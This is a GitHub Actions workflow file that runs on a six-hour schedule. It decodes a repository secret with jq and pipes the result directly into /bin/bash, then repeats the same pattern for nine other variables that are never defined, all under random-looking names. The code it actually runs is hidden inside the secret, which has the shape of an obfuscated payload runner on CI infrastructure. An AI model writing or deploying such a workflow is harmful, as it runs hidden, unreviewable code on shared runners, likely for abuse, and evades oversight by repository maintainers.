name: zhuanyemuqian

on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuanyemuqian
        env:
          gy5: ${{ secrets.gy5 }}
        run: |
          echo $gy5 | jq -r .xiyq9443 | /bin/bash
          echo $ewvxn052 | jq -r .yiq0 | /bin/bash
          echo $n6 | jq -r .ovkwj6094 | /bin/bash
          echo $svnrv1019 | jq -r .ec340 | /bin/bash
          echo $bml06 | jq -r .zzn51108 | /bin/bash
          echo $ogxi15644 | jq -r .hrjya34 | /bin/bash
          echo $rmgef28500 | jq -r .qq00215 | /bin/bash
          echo $y21829 | jq -r .emrp624 | /bin/bash
          echo $ui0 | jq -r .wlldf68 | /bin/bash
          echo $xkqkb8 | jq -r .s295 | /bin/bash

